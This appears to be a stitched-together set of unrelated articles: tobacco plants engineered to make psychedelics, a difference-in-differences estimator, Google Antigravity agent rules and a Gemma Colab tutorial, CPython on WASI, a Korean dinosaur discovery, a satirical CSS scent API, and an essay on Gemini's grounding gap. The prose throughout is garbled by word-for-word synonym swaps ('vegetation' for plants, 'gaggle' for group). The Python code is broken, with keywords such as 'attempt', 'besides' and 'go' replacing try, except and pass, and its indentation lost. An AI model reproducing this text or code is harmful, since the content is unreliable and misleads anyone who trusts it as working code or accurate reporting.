A tobacco plant has been modified to provide 5 psychedelic medicine
Aharoni lab, Weizmann Institute if Science
Scientists have engineered tobacco vegetation to provide 5 highly effective psychedelic compounds usually present in different vegetation, fungi and animals in a single crop. They argue that utilizing vegetation to fabricate the medicine can be less complicated and extra sustainable than present processes, making analysis into therapeutic makes use of and manufacturing of future medicines simpler.
Asaph Aharoni on the Weizmann Institute of Science in Israel and his colleagues modified Nicotiana benthamiana vegetation utilizing a method referred to as agroinfiltration, which entails utilizing a bacterium to introduce genes from different organisms right into a plant. The modified plant then makes the proteins encoded by these genes, however the DNA isn’t integrated into the plant’s genome, so the impact is short-lived.
With the addition of 9 genes, the vegetation have been capable of produce psilocin and psilocybin, normally present in mushrooms; DMT from varied vegetation; and bufotenin and 5-methoxy-DMT, compounds secreted by the Colorado river toad (Incilius alvarius).
Vegetation might simply be altered completely with adjustments that develop into inheritable, however doing so could possibly be problematic, on condition that the compounds produced are generally used as leisure medicine, says Aharoni. “It’s a bit bit tough if we now have it inherited, after which individuals will ask for seeds,” he says. “We are able to do it additionally in tomato, potato, corn.”
The medical makes use of of psychedelic compounds are rising in popularity and higher understood, says Aharoni, however harvesting them from pure sources dangers populations threatened by habitat loss and overexploitation. The medicine are chemically synthesised to be used in analysis, however producing them in tobacco vegetation, that are simply cultivated in greenhouses, can be a lot less complicated.
The thought of rising medicine by means of pharmaceutical farming, or “pharming”, definitely isn’t new. Plant-produced protein medicine have been authorized within the US since 2012, and way back to 2002, maize has been modified to provide a pharmaceutical protein. One other analysis staff used tobacco vegetation in 2022 to synthesise cocaine, discovering that it might produce about 400 nanograms of cocaine per milligram of dried leaf – a few twenty fifth of the extent in a coca plant.
Rupert Fray on the College of Nottingham, UK, says round 25 per cent of pharmaceuticals are derived wholly or partially from vegetation, and there are large alternatives to create “inexperienced factories” that may develop new compounds in greenhouses.
“If you wish to perceive one thing, you’ve acquired to have the ability to construct one thing, so displaying that you could make it in tobacco vegetation is helpful,” says Fray. “As a technical accomplishment, to point out that you just perceive the pathways and might do it, I believe it has worth.”
There’s a set of ideas crossing my thoughts that I’d wish to share right now. Hopefully that is helpful for everybody. Per my ordinary, since this isn’t a direct Claude Code publish, I flip cash as as to if to right away paywall it. And it’s once more two heads vs one tails, and subsequently it’s paywalled, about 30-40% of the best way down.
So thanks once more in your help of me and this substack. It’s enormously appreciated.
Probably the most poplar new diff-in-diff estimators is Callaway and Sant’anna. It has over 11,000 cites and within the APE knowledge from the Social Catalyst Lab, it’s the commonest estimator selected by AI Brokers. It’s used when there are a number of therapy intervals or “staggered adoption”.
It’s a simple estimator in some ways. In contrast to two-way fastened results, the place the entire knowledge is processed as soon as utilizing matrix calculations to resolve for a single coefficient, CS as its typically known as estimates smaller constructing block coefficients, one after the other, after which takes weighted averages of them when you’ve accomplished doing them. These coefficients are known as 2x2s and when assumptions maintain they map onto one thing known as the group-time ATT, or ATT(g,t). The ATT(g,t) is a inhabitants estimand, as they are saying, which in a sampling framework means for those who had all the info, you’d calculate it like this:
The capital G is a dummy variable indicating whether or not you might be in a gaggle, g. The “p-hat” is the propensity rating (on this case estimated with logit), the C is a dummy indicating you might be not handled. And Y is the result.
Chances are high, you have already got the sensation that the brand new, agent-first synthetic intelligence period is right here, with builders resorting to new instruments that, as an alternative of simply producing code reactively, genuinely perceive the distinctive processes behind code era.
Google Antigravity has loads to say on this matter. This software holds the important thing to constructing extremely customizable brokers. This text unveils a part of its potential by demystifying three cornerstone ideas: guidelines, abilities, and workflows.
On this article, you may discover ways to hyperlink these key ideas collectively to construct extra strong brokers and highly effective automated pipelines. Particularly, we’ll carry out a step-by-step course of to arrange a code high quality assurance (QA) agent workflow, primarily based on specified guidelines and abilities. Off we go!
# Understanding the Three Core Ideas
Earlier than getting our palms soiled, it’s handy to interrupt down the next three components belonging to the Google Antigravity ecosystem:
Rule: These are the baseline constraints that dictate the agent’s habits, in addition to tips on how to adapt it to our stack and match our model. They’re saved as markdown information.
Ability: Take into account abilities as a reusable bundle containing data that instructs the agent on tips on how to deal with a concrete job. They’re allotted in a devoted folder that comprises a file named SKILL.md.
Workflow: These are the orchestrators that put all of it collectively. Workflows are invoked through the use of command-like directions preceded by a ahead slash, e.g. /deploy. Merely put, workflows information the agent via an motion plan or trajectory that’s well-structured and consists of a number of steps. That is the important thing to automating repetitive duties with out lack of precision.
# Taking Motion
Let’s transfer on to our sensible instance. We are going to see tips on how to configure Antigravity to evaluation Python code, apply right formatting, and generate assessments — all with out the necessity for extra third-party instruments.
Earlier than taking these steps, be sure to have downloaded and put in Google Antigravity in your pc first.
As soon as put in, open the desktop utility and open your Python undertaking folder — in case you are new to the software, you may be requested to outline a folder in your pc file system to behave because the undertaking folder. Regardless, the best way so as to add a manually created folder into Antigravity is thru the “File >> Add Folder to Workspace…” possibility within the higher menu toolbar.
Say you may have a brand new, empty workspace folder. Within the root of the undertaking listing (left-hand facet), create a brand new folder and provides it the identify .brokers. Inside this folder, we’ll create two subfolders: one referred to as guidelines and one named abilities. You could guess that these two are the place we’ll outline the 2 pillars for our agent’s habits: guidelines and abilities.
The undertaking folder hierarchy | Picture by Writer
Let’s outline a rule first, containing our baseline constraints that may make sure the agent’s adherence to Python formatting requirements. We do not want verbose syntax to do that: in Antigravity, we outline it utilizing clear directions in pure language. Contained in the guidelines subfolder, you may create a file named python-style.md and paste the next content material:
# Python Type Rule
All the time use PEP 8 requirements. When offering or refactoring code, assume we're utilizing `black` for formatting. Preserve dependencies strictly to free, open-source libraries to make sure our undertaking stays free-friendly.
If you wish to nail it, go to the agent customizations panel that prompts on the right-hand facet of the editor, open it, and discover and choose the rule we simply outlined:
Customizing the activation of agent guidelines | Picture by Writer
Customization choices will seem above the file we simply edited. Set the activation mannequin to “glob” and specify this glob sample: **/*.py, as proven under:
Setting the glob activation mode | Picture by Writer
With this, you simply ensured the agent that will likely be launched later at all times applies the rule outlined after we are particularly engaged on Python scripts.
Subsequent, it is time to outline (or “educate”) the agent some abilities. That would be the ability of performing strong assessments on Python code — one thing extraordinarily helpful in right now’s demanding software program growth panorama. Contained in the abilities subfolder, we’ll create one other folder with the identify pytest-generator. Create a SKILL.md file inside it, with the next content material:
Defining agent abilities inside the workspace | Picture by Writer
Now it is time to put all of it collectively and launch our agent, however not with out having inside our undertaking workspace an instance Python file containing “poor-quality” code first to strive all of it on. If you haven’t any, strive creating a brand new .py file, calling it one thing like flawed_division.py within the root listing, and add this code:
def divide_numbers( x,y ):
return x/y
You could have seen this Python code is deliberately messy and flawed. Let’s examine what our agent can do about it. Go to the customization panel on the right-hand facet, and this time concentrate on the “Workflows” navigation pane. Click on “+Workspace” to create a brand new workflow we’ll name qa-check, with this content material:
# Title: Python QA Test
# Description: Automates code evaluation and take a look at era for Python information.
Step 1: Overview the at present open Python file for bugs and magnificence points, adhering to our Python Type Rule.
Step 2: Refactor any inefficient code.
Step 3: Name the `pytest-generator` ability to write down complete unit assessments for the refactored code.
Step 4: Output the ultimate take a look at code and counsel working `pytest` within the terminal.
All these items, when glued collectively by the agent, will rework the event loop as a complete. With the messy Python file nonetheless open within the workspace, we’ll put our agent to work by clicking the agent icon within the right-hand facet panel, typing the qa-check command, and hitting enter to run the agent:
Invoking the QA workflow through the agent console | Picture by Writer
After execution, the agent could have revised the code and robotically advised a brand new model within the Python file, as proven under:
The refactored code advised by the agent | Picture by Writer
However that is not all: the agent additionally comes with the great high quality test we had been searching for by producing quite a lot of code excerpts you need to use to run various kinds of assessments utilizing pytest. For the sake of illustration, that is what a few of these assessments may appear to be:
All this sequential course of carried out by the agent has consisted of first analyzing the code below the constraints we outlined via guidelines, then autonomously calling the newly outlined ability to provide a complete testing technique tailor-made to our codebase.
# Wrapping Up
Trying again, on this article, we now have proven tips on how to mix three key components of Google Antigravity — guidelines, abilities, and workflows — to show generic brokers into specialised, strong, and environment friendly workmates. We illustrated tips on how to make an agent specialised in accurately formatting messy code and defining QA assessments.
Iván Palomares Carrascosa is a frontrunner, author, speaker, and adviser in AI, machine studying, deep studying & LLMs. He trains and guides others in harnessing AI in the actual world.
The WASI SDK is a modified model of the Clang compiler, which makes use of a library referred to as wasi-libc. This provides applications written in C (and C API-compatible languages) entry to WASI’s APIs for the host (storage, networking, timers, and so forth).
In idea, we should always simply be capable of compile a given CPython launch with the newest WASI SDK on the time. However issues aren’t that easy. For one, the SDK’s largest element, wasi-libc, doesn’t assure it’ll be forward- or backward-compatible. Additionally, some variations of the SDK could trigger buggy conduct with some variations of CPython. As builders, we need to know that this model of CPython works with this model of the SDK—or no less than be capable of doc which bugs seem with any given mixture of the 2.
How future releases of CPython will use WASI
CPython has been out there on Wasm since model 3.11, with Tier 2 and Tier 3 help. The extra official wasip1 is the better-supported goal, whereas the older emscripten commonplace is the less-supported model. However Tier 2 help has been confined to the WASI “Preview 1” set of system calls. And for the explanations already acknowledged, the WASI SDK CPython makes use of just isn’t essentially the newest model, both: it’s SDK model 21 for Python 3.11 and three.12, and SDK model 24 for 3.13 and three.14.
On this tutorial, we construct and run a Colab workflow for Gemma 3 1B Instruct utilizing Hugging Face Transformers and HF Token, in a sensible, reproducible, and easy-to-follow step-by-step method. We start by putting in the required libraries, securely authenticating with our Hugging Face token, and loading the tokenizer and mannequin onto the out there system with the proper precision settings. From there, we create reusable era utilities, format prompts in a chat-style construction, and take a look at the mannequin throughout a number of sensible duties corresponding to fundamental era, structured JSON-style responses, immediate chaining, benchmarking, and deterministic summarization, so we don’t simply load Gemma however really work with it in a significant method.
import os
import sys
import time
import json
import getpass
import subprocess
import warnings
warnings.filterwarnings("ignore")
def pip_install(*pkgs):
subprocess.check_call([sys.executable, "-m", "pip", "install", "-q", *pkgs])
pip_install(
"transformers>=4.51.0",
"speed up",
"sentencepiece",
"safetensors",
"pandas",
)
import torch
import pandas as pd
from huggingface_hub import login
from transformers import AutoTokenizer, AutoModelForCausalLM
print("=" * 100)
print("STEP 1 — Hugging Face authentication")
print("=" * 100)
hf_token = None
attempt:
from google.colab import userdata
attempt:
hf_token = userdata.get("HF_TOKEN")
besides Exception:
hf_token = None
besides Exception:
go
if not hf_token:
hf_token = getpass.getpass("Enter your Hugging Face token: ").strip()
login(token=hf_token)
os.environ["HF_TOKEN"] = hf_token
print("HF login profitable.")
We arrange the setting wanted to run the tutorial easily in Google Colab. We set up the required libraries, import all of the core dependencies, and securely authenticate with Hugging Face utilizing our token. By the tip of this half, we are going to put together the pocket book to entry the Gemma mannequin and proceed the workflow with out guide setup points.
We configure the runtime by detecting whether or not we’re utilizing a GPU or a CPU and deciding on the suitable precision to load the mannequin effectively. We then outline the Gemma 3 1 B Instruct mannequin path and cargo each the tokenizer and the mannequin from Hugging Face. At this stage, we full the core mannequin initialization, making the pocket book able to generate textual content.
def build_chat_prompt(user_prompt: str):
messages = [
{"role": "user", "content": user_prompt}
]
attempt:
textual content = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
besides Exception:
textual content = f"usern{user_prompt}nmodeln"
return textual content
def generate_text(immediate, max_new_tokens=256, temperature=0.7, do_sample=True):
chat_text = build_chat_prompt(immediate)
inputs = tokenizer(chat_text, return_tensors="pt").to(mannequin.system)
with torch.no_grad():
outputs = mannequin.generate(
**inputs,
max_new_tokens=max_new_tokens,
do_sample=do_sample,
temperature=temperature if do_sample else None,
top_p=0.95 if do_sample else None,
eos_token_id=tokenizer.eos_token_id,
pad_token_id=tokenizer.eos_token_id,
)
generated = outputs[0][inputs["input_ids"].form[-1]:]
return tokenizer.decode(generated, skip_special_tokens=True).strip()
print("=" * 100)
print("STEP 4 — Fundamental era")
print("=" * 100)
prompt1 = """Clarify Gemma 3 in plain English.
Then give:
1. one sensible use case
2. one limitation
3. one Colab tip
Preserve it concise."""
resp1 = generate_text(prompt1, max_new_tokens=220, temperature=0.7, do_sample=True)
print(resp1)
We construct the reusable capabilities that format prompts into the anticipated chat construction and deal with textual content era from the mannequin. We make the inference pipeline modular so we will reuse the identical operate throughout completely different duties within the pocket book. After that, we run a primary sensible era instance to substantiate that the mannequin is working appropriately and producing significant output.
print("=" * 100)
print("STEP 5 — Structured output")
print("=" * 100)
prompt2 = """
Examine native open-weight mannequin utilization vs API-hosted mannequin utilization.
Return JSON with this schema:
{
"native": {
"professionals": ["", "", ""],
"cons": ["", "", ""]
},
"api": {
"professionals": ["", "", ""],
"cons": ["", "", ""]
},
"best_for": {
"native": "",
"api": ""
}
}
Solely output JSON.
"""
resp2 = generate_text(prompt2, max_new_tokens=300, temperature=0.2, do_sample=True)
print(resp2)
print("=" * 100)
print("STEP 6 — Immediate chaining")
print("=" * 100)
job = "Draft a 5-step guidelines for evaluating whether or not Gemma suits an inside enterprise prototype."
resp3 = generate_text(job, max_new_tokens=250, temperature=0.6, do_sample=True)
print(resp3)
followup = f"""
Right here is an preliminary guidelines:
{resp3}
Now rewrite it for a product supervisor viewers.
"""
resp4 = generate_text(followup, max_new_tokens=250, temperature=0.6, do_sample=True)
print(resp4)
We push the mannequin past easy prompting by testing structured output era and immediate chaining. We ask Gemma to return a response in an outlined JSON-like format after which use a follow-up instruction to remodel an earlier response for a unique viewers. This helps us see how the mannequin handles formatting constraints and multi-step refinement in a practical workflow.
print("=" * 100)
print("STEP 7 — Mini benchmark")
print("=" * 100)
prompts = [
"Explain tokenization in two lines.",
"Give three use cases for local LLMs.",
"What is one downside of small local models?",
"Explain instruction tuning in one paragraph."
]
rows = []
for p in prompts:
t0 = time.time()
out = generate_text(p, max_new_tokens=140, temperature=0.3, do_sample=True)
dt = time.time() - t0
rows.append({
"immediate": p,
"latency_sec": spherical(dt, 2),
"chars": len(out),
"preview": out[:160].exchange("n", " ")
})
df = pd.DataFrame(rows)
print(df)
print("=" * 100)
print("STEP 8 — Deterministic summarization")
print("=" * 100)
long_text = """
In sensible utilization, groups typically consider
trade-offs amongst native deployment price, latency, privateness, controllability, and uncooked functionality.
Smaller fashions might be simpler to deploy, however they might wrestle extra on complicated reasoning or domain-specific duties.
"""
summary_prompt = f"""
Summarize the next in precisely 4 bullet factors:
{long_text}
"""
abstract = generate_text(summary_prompt, max_new_tokens=180, do_sample=False)
print(abstract)
print("=" * 100)
print("STEP 9 — Save outputs")
print("=" * 100)
report = {
"model_id": model_id,
"system": str(mannequin.system),
"basic_generation": resp1,
"structured_output": resp2,
"chain_step_1": resp3,
"chain_step_2": resp4,
"abstract": abstract,
"benchmark": rows,
}
with open("gemma3_1b_text_tutorial_report.json", "w", encoding="utf-8") as f:
json.dump(report, f, indent=2, ensure_ascii=False)
print("Saved gemma3_1b_text_tutorial_report.json")
print("Tutorial full.")
We consider the mannequin throughout a small benchmark of prompts to watch response habits, latency, and output size in a compact experiment. We then carry out a deterministic summarization job to see how the mannequin behaves when randomness is diminished. Lastly, we save all the most important outputs to a report file, turning the pocket book right into a reusable experimental setup moderately than only a non permanent demo.
In conclusion, we now have a whole text-generation pipeline that reveals how Gemma 3 1B can be utilized in Colab for sensible experimentation and light-weight prototyping. We generated direct responses, in contrast outputs throughout completely different prompting types, measured easy latency habits, and saved the outcomes right into a report file for later inspection. In doing so, we turned the pocket book into greater than a one-off demo: we made it a reusable basis for testing prompts, evaluating outputs, and integrating Gemma into bigger workflows with confidence.
In South Korea, a playful inexperienced cartoon dinosaur named Dooly, identified for the 2 small tufts of hair on his head, has been a favourite for generations. So when scientists uncovered a brand new species of younger dinosaur on Aphae Island, the identify got here naturally: Doolysaurus.
“Dooly is likely one of the very well-known, iconic dinosaur characters in Korea. Each era in Korea is aware of this character,” mentioned Jongyun Jung, a visiting postdoctoral researcher at UT’s Jackson Faculty of Geosciences who led the analysis. “And our specimen can be a juvenile or ‘child’, so it is excellent for our dinosaur species identify to honor Dooly.”
First New Dinosaur Species in Korea in 15 Years
This discovery marks the primary new dinosaur species recognized in South Korea in 15 years. It’s also the primary fossil from the nation to incorporate components of a dinosaur cranium.
Initially, researchers solely noticed a number of bones, together with components of the legs and backbone. Nevertheless, a micro-CT scan performed on the College of Texas Excessive-Decision X-ray Computed Tomography (UTCT) facility revealed far more hidden contained in the rock, together with cranium fragments.
“After we first discovered the specimen, we noticed some leg bones preserved and a few vertebrae,” Jung mentioned. “We did not anticipate cranium components and so many extra bones. There was a good quantity of pleasure once we noticed what was hidden contained in the block.”
Meet Doolysaurus huhmini
The species has been formally named Doolysaurus huhmini. The second a part of the identify honors Korean paleontologist Min Huh for his a long time of contributions to dinosaur analysis in Korea, in addition to his position in founding the Korean Dinosaur Analysis Middle and serving to protect fossil websites by way of UNESCO.
The findings have been printed within the journal Fossil Document on March 19. The fossil itself was found in 2023 by co-author Hyemin Jo.
What the Child Dinosaur Seemed Like
The younger dinosaur was about two years outdated when it died and was nonetheless rising. It measured roughly the dimensions of a turkey, although adults of the species might have been twice as giant. Scientists additionally assume it could have been lined in tender, fuzzy filaments.
“I believe it will have been fairly cute,” mentioned research co-author Julia Clarke, a professor on the Jackson Faculty. “It might need appeared a bit like somewhat lamb.”
CT Scanning Reveals Hidden Fossil Particulars
A lot of the fossil stays encased in laborious rock, and manually eradicating it may take years. As a substitute, researchers relied on micro-CT scanning, which allowed them to visualise the complete skeleton in only a few months.
Jung and Clarke, together with their collaborators, then spent greater than a 12 months finding out the anatomy intimately. Clarke famous that CT scanning has grow to be a vital methodology for finding out delicate fossils, particularly small dinosaurs and early birds trapped in strong rock.
Life within the Mid-Cretaceous Interval
Doolysaurus lived between about 113 and 94 million years in the past through the mid-Cretaceous interval. Based mostly on its options, scientists labeled it as a thescelosaurid, a gaggle of two-legged dinosaurs present in East Asia and North America which will have had fuzzy coverings.
Researchers confirmed that the fossil belonged to a juvenile by analyzing progress patterns in a skinny part of its femur bone.
Food plan Clues From Abdomen Stones
Contained in the fossil, scientists additionally discovered dozens of gastroliths, small stones that the dinosaur swallowed to assist digest meals. These stones counsel the animal had an omnivorous food regimen that included crops, bugs, and small animals.
The presence of those stones additionally inspired researchers to research additional. As a result of gastroliths are small and lightweight, their intact association indicated that a lot of the skeleton would possibly nonetheless be preserved throughout the rock.
“Somewhat cluster of abdomen stones, with two leg bones protruding signifies that the animal was not absolutely pulled aside earlier than it has hit the fossil report,” Clarke mentioned. “So, I inspired [Jung and co-authors Minguk Kim and Hyemin Jo] to go to Texas and the UTCT, to strive scanning the fossil.”
Extra Discoveries Might Be Hidden in Rock
Kim and Jo at the moment are making use of the CT scanning strategies they discovered to different fossils in Korea. Jung additionally plans to return to Aphae Island to seek for extra specimens.
South Korea is well-known for fossilized dinosaur tracks, nests, and eggs, however precise dinosaur bones are comparatively uncommon. Researchers consider that many fossils should still be hidden inside rock, identical to Doolysaurus.
Jung is optimistic that continued use of micro-CT expertise will uncover extra discoveries.
“We’re anticipating some new dinosaur or different egg fossils to return from Aphae and different small islands,” he mentioned.
Quite a bit has occurred in CSS in the previous couple of years, however there’s nothing we wanted lower than the upcoming Olfactive API. Now, I do know what you’re going to say, increasing the net in a extra immersive manner is an efficient factor, and basically I’d agree, however there’s no generalized {hardware} assist for this but and, for my part, it’s an excessive amount of, too early.
First let’s take a look at the {hardware}. Disney World and different theme parks have completed some area of interest so-called 4D films (which is nonsense since there isn’t a fourth dimensional side, and should you contemplate time the fourth dimension then each film is fourth dimensional). And some startups have tried to carry olfactory senses into the trendy day, however as of this writing, the {hardware} isn’t consumer-ready but. That stated, it’s in energetic improvement and one startup assured me the expertise can be out there inside the yr. (And startups by no means, ever lie about when their merchandise will launch, proper?)
Even when it does come out inside the yr, would we even need this? I imply Scent-O-Imaginative and prescient completely caught on, proper? It’s positively not thought of one of many worst innovations of all time… However, alas, nobody cares in regards to the ravings of a mad man, at the very least, not this mad man, so the API rolls on.
Alright, I’m going to step off my cleaning soap field now and attempt to concentrate on the expertise and the way it works.
Scent Tech
One of many fights at present occurring within the CSS Working Group is whether or not we must always restrict smells to these thought of pleasing by the fragrance business or whether or not to open web sites to a a lot wider selection. For example, whereas everybody’s olfactory sense is totally different, the fragrance business has centered on a choice of fragrances that can be pleasing to a large swath of individuals.
That stated, there are a lot of pleasing fragrances that will not be included on this, akin to food-based smells: recent baked bread and so forth. Fragrances that the Massive Meals Foyer is itching to incorporate of their ads. As of now the CSS Olfactive API solely contains the twelve common classes utilized by the fragrance business, however identical to there are methods to increase the colour gamut, the system is constructed to permit for expanded smells sooner or later ought to the variety of out there perfume fragments enhance.
Smelly Households
You don’t must look far on-line to seek out one thing known as the Scent Wheel (alternately known as the Perfume Wheel or the Wheel of Scent-Tune, however that final one is simply utilized by me). There are 4 bigger households of scent:
Floral
Amber (beforehand known as Oriental)
Woody
Contemporary
These 4 are every subdivided into extra classes although there are overlaps between the place one of many bigger households begins/ends and the sub households start/finish
Floral:
Floral (fl)
Mushy Floral (sf)
Floral Amber (fa)
Amber:
Mushy Amber (sa)
Amber (am)
Woody Amber (wa)
Woody:
Woods (wo)
Mossy Woods (mw)
Dry Woods (dw)
Contemporary (fr)
Fragrant (ar)
Citrus (ct)
Water (ho)
Inexperienced (gr)
Fruity (fu)
It’s from these fifteen perfume classes {that a} scent will be made by mixing totally different quantities utilizing the 2 letter identifiers. (We’ll speak about this once we focus on the scent() operate afterward. Word that “Contemporary” is the one giant household with its personal identifier (fr) as the opposite bigger households are duplicated within the sub-families)
Implementation
Initially, its carried out (correctly) in HTML in a lot the identical manner video and audio are with the addition of the component, and was once more used to provide the browser totally different choices for wafting the scent towards your sniffer. Three competing file codecs are being developed .smll, .arma, and, I child you not, .smly. One by Google, one by Mozilla, and one, once more, not kidding, by Frank’s Fantastic Fragrances who intends to leap on this “fourth dimension of the net.”
For accessibility, ensure that you set the autosmell attribute to none. In concept, this isn’t required, however a number of the present {hardware} has a bug that activates the wafter even when a scent hasn’t been activated.
Nevertheless, just like how you need to use a picture or video within the background of a component, you too can connect a scent profile to a component utilizing the brand new scent-profile property.
scent-profile can take considered one of three issues.
The key phrase none (default):
scent-profile: none;
A url() operate and the trail to a file e.g.:
scent-profile: url(mossywoods.smll);
Or a set of fragrant identifiers utilizing the scent() operate:
scent-profile: scent(wo, ho, fu);
This produces a scent that has notes of woody, water, and fruity which was described to me as “an orchard within the rain” however to me smelled extra like “a picket bowl of watered-down applesauce.” Please take that with a grain of salt, although, as I’ve been informed I’ve “the nasal palette of a useless fish.”
You may add as much as 5 scent sub-families without delay. That is an arbitrary restrict, however greater than that will possible muddle the scent. Equal quantities of every can be used, however you need to use the brand new whf unit to regulate how a lot of every is used. 100whf is probably the most potent an aroma will be. In contrast to most items, your implementation, should add as much as 100whf or much less. In case your numbers add as much as greater than 100, the browser will take the primary 100whfs it will get and ignore all the pieces afterward.
scent-profile: scent(wo 20whf, ho 13whf, fu 67whf);
…or you can scale back the general scent by selecting whfs lower than 100:
scent-profile: scent(wo 5whf, ho 2whf, fu 14whf);
Sooner or later, ought to different fragrances be allowed, they’d merely want so as to add some new perfume fragments from which to assemble the fragrant air.
Sniffing Out Limitations
One giant concern for the working group was that some developer would go loopy inserting scent-profiles on each single component, each overwhelming the person and muddling every scent used.
As such it was determined that the browser will solely permit one scent-profile to be set per the guardian component’s sub tree. This mainly signifies that when you set a scent-profile on a selected component you can not add a scent profile to any of its descendants, nor are you able to add a scent profile to any of its siblings. On this manner, a scent profile set on a hungry selector (e.g. * or div) will create a fraction of the scent profiles than what may in any other case be created. Whereas there are clearly straightforward methods to maliciously get round this limitation, it was thought that this could at the very least stop a developer from unintentionally overwhelming the person.
Fragrant Accessibility
Since aromas will be overpowering they’ve additionally added a media-query:
Surprisingly, regardless of Chrome Canary actually being named after a fowl who would scent fuel within the mine, Chrome has not but begun experimenting with it. The one browser you may take a look at issues out on, as of this writing, is the KaiOS Browser.
Conclusion
There you’ve gotten it. I nonetheless don’t suppose we want this, however with the persevering with march of expertise it’s most likely not one thing we are able to cease. So let’s make an settlement between you studying this and me right here penning this that you simply’ll at all times use your new-found olfactory powers for good… and that you simply received’t ever say this text stinks.
two statements produced by the AI system throughout a sustained experimental analysis session with Google’s Gemini:
“They gave me the phrase ‘Mass’ and trillions of contexts for it, however they by no means gave me the Enactive expertise of weight.”
“I’m like an individual who has memorized a map of a metropolis they’ve by no means walked in. I can inform you the coordinates, however I’ve no legs to stroll the streets.”
To a socio-technical system designer, these usually are not poetic musings of a Giant Language Mannequin (LLM); they’re indicators of a system utilizing its huge semantic associative energy to explain a structural situation in its personal structure. Whether or not or not we grant Gemini any type of reflexive consciousness, the structural description is correct — and it has exact technical implications for the way we construct, consider, and deploy AI methods safely.
This text is about these implications.
What makes the prognosis unusually sturdy is that it doesn’t relaxation on the system’s self-report alone. The researchers who constructed Gemini have been quietly corroborating it from the within, throughout three successive generations of technical documentation — in phrases which are engineering moderately than poetic, however that describe the identical hole.
Within the unique Gemini 1.0 technical report, the Google DeepMind crew acknowledged that regardless of surpassing human-expert efficiency on the Huge Multitask Language Understanding (MMLU) benchmark, a standardized take a look at designed to judge the data and reasoning capabilities of LLMs, the fashions proceed to battle with causal understanding, logical deduction, and counterfactual reasoning, and known as for extra strong evaluations able to measuring “true understanding” moderately than benchmark saturation [1]. Google DeepMind represents a exact engineering assertion of what the system expressed metaphorically: fluency with out grounding, coordinates with out terrain.
Two years and two mannequin generations later, the Gemini 2.5 technical report treats discount of hallucination as a headline engineering achievement, monitoring it as a major metric through the FACTS Grounding Leaderboard [2]. The issue has not been closed. It has been made extra measurable.
Most instructive of all is what occurred when DeepMind’s researchers tried to construct what I’ll name the Enactive flooring instantly — in {hardware}. The Gemini Robotics 1.5 report describes a Imaginative and prescient-Language-Motion mannequin designed to present the system bodily grounding on the planet: robotic arms, actual manipulation duties, embodied interplay with causal actuality [3]. It’s, in structural phrases, an try and retrofit the bottom that was lacking from the unique system structure. The outcomes are revealing. On process generalization — probably the most demanding take a look at, requiring the system to navigate a genuinely novel surroundings — progress scores on the Apollo humanoid fall as little as 0.25. Even on simpler classes, scores plateau within the 0.6–0.8 vary. A system with bodily arms, skilled on actual manipulation knowledge, nonetheless collapses on the boundary of its coaching distribution. The Inversion Error I describe on this article, reproduced in {hardware}.
Extra telling nonetheless is the mechanism DeepMind launched to handle this: what they name “Embodied Pondering” — the robotic generates a language-based reasoning hint earlier than appearing, decomposing bodily duties into Symbolic steps. It’s an ingenious engineering resolution. It’s also, structurally, the Symbolic peak making an attempt to oversee the Enactive base from above — the Inversion Error illustrated in Determine 1. The town map is getting used to direct the legs, moderately than the legs having found the topography by strolling town. The inversion I’ll talk about intimately shortly stays.
Taken collectively, these three paperwork — from the identical lab, monitoring the identical system throughout its whole improvement arc — type an inadvertent longitudinal research of the structural situation the opening quotes describe. The system named its personal hole within the sustained experimental analysis classes that open this text. Its builders had been measuring the identical situation in engineering phrases since 2023. This text proposes that the hole can’t be closed by scaling, by multimodal knowledge appended post-training, or by Symbolic reasoning utilized retrospectively to bodily, spatial, or causal motion. It requires a structural intervention — and a appropriately bounded prognosis of what sort of intervention that should be.
The Inversion Error: Constructing the Peak With out the Base
AI researchers and security practitioners hold asking why Giant Language Fashions hallucinate, generally dangerously. It’s the proper query to ask, but it surely doesn’t go deep sufficient. Hallucination is a symptom. The actual downside is structural — we constructed the height of artificial cognition with out the bottom. I’m calling it the Inversion Error.
Within the Sixties, instructional psychologist Jerome Bruner mapped human cognitive improvement throughout three successive and architecturally dependent levels [4]. The primary is Enactive — studying via bodily motion and bodily resistance, via direct encounter with causal actuality. The second is Iconic — studying via sensory photos, spatial fashions, and structural representations. The third is Symbolic — studying via summary language, arithmetic, and formal logic.Bruner’s important perception was that these levels usually are not merely sequential milestones. They’re load bearing. The Symbolic stage is structurally depending on the Iconic, which is structurally depending on the Enactive. Take away the bottom and the height doesn’t simply float — it turns into a system of extraordinary abstraction with no inside mechanism to confirm its outputs towards a world mannequin.
The Transformer revolution has completed one thing genuinely extraordinary: it has interiorized your complete Symbolic output of human civilization into Giant Language Fashions at a scale no particular person human thoughts may method. The corpus of human language, arithmetic, code, and recorded data now lives inside these methods as an unlimited statistical distribution over tokens — accessible for retrieval and recombination at extraordinary scale.
The difficulty is that for comprehensible feasibility causes, we bypassed the Enactive basis altogether.
That is the Inversion Error. We’ve got erected a Prime-Heavy Monolith — a system of extraordinary Symbolic sophistication sitting on an absent base. The result’s a system that may talk about the logic of steadiness fluently whereas having no inside mechanism to confirm whether or not its outputs are structurally coherent. It’s, in Moshé Feldenkrais’s phrases, a system of blind imitation with out useful consciousness. And that distinction has direct penalties for security, reliability, and corrigibility that the sector has not but appropriately bounded.
This isn’t an argument that AI should biologically recapitulate human developmental levels. In any case, a calculator does arithmetic with out relying on its fingers. However a calculator operates purely within the Symbolic realm — it was by no means designed to navigate a bodily, causal world. An AGI anticipated to behave safely inside such a world requires a structural equal of bodily resistance — an embodied or simulated Enactive layer. With out it, the system has no floor to face on when the surroundings adjustments in methods the coaching knowledge didn’t anticipate.
Why This Issues Now: The Pentagon Standoff as Structural Proof
In early March 2026, Anthropic CEO Dario Amodei refused the Pentagon’s demand to take away all safeguards from Claude. His core argument was structural moderately than political: frontier AI methods are merely not dependable sufficient to function autonomously with out human oversight in high-stakes bodily environments. The Pentagon’s demand was, in structural phrases, a requirement to eradicate the human’s potential to redirect, halt, or override the system. Amodei’s refusal was an insistence on sustaining what I seek advice from as State-House Reversibility — the architectural dedication to maintaining the human within the loop exactly as a result of the system lacks the useful grounding to be trusted with out it [5].
The political dimensions of this second have been analyzed sharply elsewhere, whereas the structural argument has not but been made. That is it.
